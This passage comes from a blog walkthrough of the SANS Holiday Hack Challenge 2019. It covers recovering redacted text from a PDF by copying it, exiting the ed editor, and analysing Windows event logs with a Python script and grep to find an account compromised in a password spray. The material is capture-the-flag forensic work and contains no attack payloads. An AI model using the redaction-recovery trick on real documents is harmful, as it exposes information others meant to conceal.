have debug symbols that you can use.&lt;/p&gt;
&lt;p&gt;Recover the plaintext content for this encrypted document. We know that it
was encrypted on December 6, 2019, between 7pm and 9pm UTC.&lt;/p&gt;
&lt;p&gt;What is the middle line on the cover page? (Hint: it's five words)&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p class="first"&gt;Visit Shinny Upatree in the Student Union and help solve their problem.
What is written on the paper you retrieve for Shinny?&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p class="first"&gt;Use the data supplied in the Zeek JSON logs to identify the IP addresses of
attackers poisoning Santa's flight mapping software. &lt;a class="reference external" href="https://srf.elfu.org/"&gt;Block the 100
offending sources of information to guide Santa's sleigh&lt;/a&gt;
through the attack. Submit the Route ID (&amp;quot;RID&amp;quot;) success value that you're
given.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Now, this year I did use some hints, because there were some questions that
were outside my domain of expertise. So I thought I wouldn't restrict myself,
so that I could get to the end of the challenge. Anyway, let's get to it!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-0-talk-to-santa-in-the-quad"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id2"&gt;Objective 0: Talk to Santa in the Quad&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The first objective is to talk to Santa in the Quad.&lt;/p&gt;
&lt;img alt="santa_squad.png" class="align-center" src="/images/sans-christmas-challenge-2019/santa_squad.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This is a little embarrassing, but I need your help.&lt;/p&gt;
&lt;p&gt;Our KringleCon turtle dove mascots are missing!&lt;/p&gt;
&lt;p&gt;They probably just wandered off.&lt;/p&gt;
&lt;p&gt;Can you please help find them?&lt;/p&gt;
&lt;p&gt;To help you search for them and get acquainted with KringleCon, I’ve
created some objectives for you. You can see them in your badge.&lt;/p&gt;
&lt;p&gt;Where's your badge? Oh! It's that big, circle emblem on your chest - give
it a tap!&lt;/p&gt;
&lt;p&gt;We made them in two flavors - one for our new guests, and one for those
who've attended both KringleCons.&lt;/p&gt;
&lt;p&gt;After you find the Turtle Doves and complete objectives 2-5, please come
back and let me know.&lt;/p&gt;
&lt;p&gt;Not sure where to start? Try hopping around campus and talking to some
elves.&lt;/p&gt;
&lt;p&gt;If you help my elves with some quicker problems, they'll probably remember
clues for the objectives.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Alright, so the KringleCon's mascots are missing and we must find them. There
are also some more objectives we must fulfill before coming back to Santa.
Let's look for the missing turtle doves!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-1-find-the-turtle-doves"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id3"&gt;Objective 1: Find the Turtle Doves&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The two turtle doves are simply in the student union building, next to the
chimney.&lt;/p&gt;
&lt;img alt="turtledoves.png" class="align-center" src="/images/sans-christmas-challenge-2019/turtledoves.png" /&gt;
&lt;p&gt;&lt;em&gt;Michael and Jane, the turtle doves, say&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
Hoot Hooot?&lt;/blockquote&gt;
&lt;p&gt;Let's go back to the squad to tell Santa.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-2-unredact-threatening-document"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id4"&gt;Objective 2: Unredact Threatening Document&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;In a corner of the squad, we find &lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/LetterToElfUPersonnel.pdf"&gt;a letter&lt;/a&gt;
addressed to the personnel of Elf U, with some redacted content.&lt;/p&gt;
&lt;p&gt;However, we can easily recover the redacted content by selecting the text, and
copying/pasting it into a text editor.&lt;/p&gt;
&lt;img alt="redacted_letter.png" class="align-center" src="/images/sans-christmas-challenge-2019/redacted_letter.png" /&gt;
&lt;p&gt;&lt;em&gt;Redacted letter says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Date: February 28, 2019&lt;/p&gt;
&lt;p&gt;To the Administration, Faculty, and Staff of Elf University
17 Christmas Tree Lane
North Pole&lt;/p&gt;
&lt;p&gt;From: A Concerned and Aggrieved Character&lt;/p&gt;
&lt;p&gt;Subject: DEMAND: Spread Holiday Cheer Confidential
to Other Holidays and Mythical Characters... OR
ELSE!&lt;/p&gt;
&lt;p&gt;Attention All Elf University Personnel,&lt;/p&gt;
&lt;p&gt;It remains a constant source of frustration that Elf University and the
entire operation at the North Pole focuses exclusively on Mr. S. Claus and
his year-end holiday spree. We URGE you to consider lending your
considerable resources and expertise in providing merriment, cheer, toys,
candy, and much more to other holidays year-round, as well as to other
mythical Confidential characters.&lt;/p&gt;
&lt;p&gt;For centuries, we have expressed our frustration at your lack of
willingness to spread your cheer beyond the inaptly-called “Holiday
Season.” There are many other perfectly fine holidays and mythical
characters that need your direct support year-round.&lt;/p&gt;
&lt;p&gt;If you do not accede to our demands, we will be forced to take matters into
our own hands.  We do not make this threat lightly. You have less than six
months to act demonstrably.&lt;/p&gt;
&lt;p&gt;Sincerely,&lt;/p&gt;
&lt;p class="attribution"&gt;&amp;mdash;A Concerned and Aggrieved Character&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-3"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id5"&gt;Objective 3:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="bushy-evergreen-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id6"&gt;Bushy Evergreen's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Bushy is still having problem exiting his editor. But this one is an old one.&lt;/p&gt;
&lt;pre class="literal-block"&gt;
                  ........................................
               .;oooooooooooool;,,,,,,,,:loooooooooooooll:
             .:oooooooooooooc;,,,,,,,,:ooooooooooooollooo:
           .';;;;;;;;;;;;;;,''''''''';;;;;;;;;;;;;,;ooooo:
         .''''''''''''''''''''''''''''''''''''''''';ooooo:
       ;oooooooooooool;''''''',:loooooooooooolc;',,;ooooo:
    .:oooooooooooooc;',,,,,,,:ooooooooooooolccoc,,,;ooooo:
  .cooooooooooooo:,''''''',:ooooooooooooolcloooc,,,;ooooo,
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;ooo,
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;l'
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,..
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc.
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooo:.
  coooooooooooooo,,,,,,,,,;ooooooooooooooloo;
  :llllllllllllll,'''''''';llllllllllllllc,
Oh, many UNIX tools grow old, but this one's showing gray.
That Pepper LOLs and rolls her eyes, sends mocking looks my way.
I need to exit, run - get out! - and celebrate the yule.
Your challenge is to help this elf escape this blasted tool.
-Bushy Evergreen
Exit ed.
1100
&lt;/pre&gt;
&lt;p&gt;So, we need to exit &lt;code&gt;ed&lt;/code&gt;. I don't know this editor, so I had to search
how to exit it. &lt;a class="reference external" href="https://www.computerhope.com/unix/ued.htm"&gt;Apparently&lt;/a&gt;,
just inputing &lt;code&gt;q&lt;/code&gt; is enough:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
1100
q
Loading, please wait......
You did it! Congratulations!
elf&amp;#64;6f68f4ebb298:~$
&lt;/pre&gt;
&lt;/div&gt;
&lt;div class="section" id="windows-log-analysis-evaluate-attack-outcome"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id7"&gt;Windows Log Analysis: Evaluate Attack Outcome&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Apparently, the person who wrote the threat letter is serious, because we have
reports saying that there are ongoing attacks against the Elf U domain. We're
given the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/Security.evtx.zip"&gt;event logs&lt;/a&gt;,
and tasked to find the account that was compromised using the password spray
attack.&lt;/p&gt;
&lt;p&gt;In order to have a format that is more easy to parse, we can use &lt;a class="reference external" href="https://github.com/williballenthin/python-evtx/"&gt;python-evtx&lt;/a&gt; to convert the
&lt;code&gt;.evtx&lt;/code&gt; to an XML file. There is an &lt;a class="reference external" href="https://github.com/williballenthin/python-evtx/blob/master/scripts/evtx_dump.py"&gt;evtx_dump.py&lt;/a&gt;
script to do so:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; evtx_dump.py Security.evtx &amp;gt; Security_evtx.xml
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's take a look at the &lt;code&gt;EventIDs&lt;/code&gt; in this file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep EventID Security_evtx.xml &lt;span class="p"&gt;|&lt;/span&gt; sort &lt;span class="p"&gt;|&lt;/span&gt; uniq -c &lt;span class="p"&gt;|&lt;/span&gt; sort -n
&lt;span class="go"&gt;      1             &amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;1102&amp;lt;/EventID&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;      1             &amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4616&amp;lt;/EventID&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;      2             &amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4768&amp;lt;/EventID&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;      4             &amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4776&amp;lt;/EventID&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;      5             &amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4769&amp;lt;/EventID&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     15             &amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4634&amp;lt;/EventID&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;     16             &amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4624&amp;lt;/EventID&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;     16             &amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4672&amp;lt;/EventID&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   2386             &amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4625&amp;lt;/EventID&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   2387             &amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4648&amp;lt;/EventID&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The most interesting is 4624, because it's the one that says that &lt;a class="reference external" href="https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624"&gt;an account
was successfully logged on&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let's create a small Python script to list every accounts with an
&lt;code&gt;EventID&lt;/code&gt; of 4624:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python3&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;sys&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;bs4&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BeautifulSoup&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;usage: {} &amp;lt;security_evtx.xml&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;

    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;r&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;security_evtx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;BeautifulSoup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;lxml&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="n"&gt;users_success_login_attempt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;set&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;evt&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;security_evtx&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;find_all&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;evt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;system&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;eventid&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;contents&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;4624&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;users_success_login_attempt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
                        &lt;span class="n"&gt;evt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;eventdata&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;find_all&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;attrs&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;TargetUserName&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;})[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;string&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="ne"&gt;IndexError&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;pass&lt;/span&gt;

    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;users_success_login_attempt&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ./parse_evtx_xml.py Security_evtx.xml
&lt;span class="go"&gt;{&amp;#39;supatree&amp;#39;, &amp;#39;DC1$&amp;#39;, &amp;#39;pminstix&amp;#39;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Only three accounts have this code: &lt;code&gt;supatree&lt;/code&gt;, &lt;code&gt;pminstix&lt;/code&gt;, and
&lt;code&gt;DC1$&lt;/code&gt;. This last one seems to be the domain controller, we can likely
ignore it. So it's between &lt;code&gt;supatree&lt;/code&gt; and &lt;code&gt;pminstix&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Now, how can we determined which one was compromised? There is another
&lt;code&gt;EventID&lt;/code&gt; that is interesting: the 4625. This ID indicates that &lt;a class="reference external" href="https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625"&gt;an
account failed to log on&lt;/a&gt;.
During a password spray attack, if an account is compromised, an authentication
attempt succeeded. So the compromised account should have one less event with
ID 4625. Let's do some &lt;code&gt;grep&lt;/code&gt; magic to find the corresponding account:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -wE &lt;span class="s1"&gt;&amp;#39;4625|TargetUserName&amp;#39;&lt;/span&gt; Security_evtx.xml &lt;span class="p"&gt;|&lt;/span&gt; grep -A &lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;4625&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; grep TargetUserName &lt;span class="p"&gt;|&lt;/span&gt; sort &lt;span class="p"&gt;|&lt;/span&gt; uniq -c &lt;span class="p"&gt;|&lt;/span&gt; sort -nr
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;ygreenpie&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;ygoldentrifle&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;wopenslae&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;twinterfig&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;ttinselbubbles&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;tcandybaubles&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;sscarletpie&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;smullingfluff&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;smary&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;sgreenbells&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;pbrandyberry&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;mstripysleigh&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;mbrandybells&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;ltrufflefig&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;lstripyleaves&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;hevergreen&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;hcandysnaps&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;gchocolatewine&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;gcandyfluff&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;ftwinklestockings&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;ftinseltoes&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;esparklesleigh&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;dsparkleleaves&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;cstripyfluff&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;cjinglebuns&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;civysparkles&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;civypears&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;bevergreen&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;bbrandyleaves&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;     77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;Administrator&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;     76 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;supatree&amp;lt;/Data&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's decompose this command. The first part is:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
grep -wE '4625|TargetUserName' Security_evtx.xml
&lt;/pre&gt;
&lt;p&gt;It will select every line containing the string 4625 or
&lt;code&gt;TargetUserName&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;On to the second part:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
| grep -A 1 '4625'
&lt;/pre&gt;
&lt;p&gt;It will select in the previous output every line containing 4625
and the line after it. This will give us an output of every event ID 4625 and
every associated username. Here's the output:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
&amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4625&amp;lt;/EventID&amp;gt;
&amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;Administrator&amp;lt;/Data&amp;gt;
--
&amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4625&amp;lt;/EventID&amp;gt;
&amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;bbrandyleaves&amp;lt;/Data&amp;gt;
--
&amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4625&amp;lt;/EventID&amp;gt;
&amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;bevergreen&amp;lt;/Data&amp;gt;
--
&amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4625&amp;lt;/EventID&amp;gt;
&amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;civypears&amp;lt;/Data&amp;gt;
--
&amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4625&amp;lt;/EventID&amp;gt;
&amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;civysparkles&amp;lt;/Data&amp;gt;
--
&amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4625&amp;lt;/EventID&amp;gt;
&amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;cjinglebuns&amp;lt;/Data&amp;gt;
--
&amp;lt;EventID Qualifiers=&amp;quot;&amp;quot;&amp;gt;4625&amp;lt;/EventID&amp;gt;
&amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;cstripyfluff&amp;lt;/Data&amp;gt;
&lt;/pre&gt;
&lt;p&gt;For the third part:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
| grep TargetUserName
&lt;/pre&gt;
&lt;p&gt;It will select every username in the previous output. We now have the list of
every username with a failed authentication attempt.&lt;/p&gt;
&lt;p&gt;Finally the last part:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
| sort | uniq -c | sort -nr
&lt;/pre&gt;
&lt;p&gt;It will sort every entry, count every occurrence, and sort it by number of
occurrences. This gives us the final output:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;ygreenpie&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;ygoldentrifle&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;wopenslae&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;twinterfig&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;ttinselbubbles&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;tcandybaubles&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;sscarletpie&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;smullingfluff&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;smary&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;sgreenbells&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;pbrandyberry&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;mstripysleigh&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;mbrandybells&amp;lt;/Data&amp;gt;
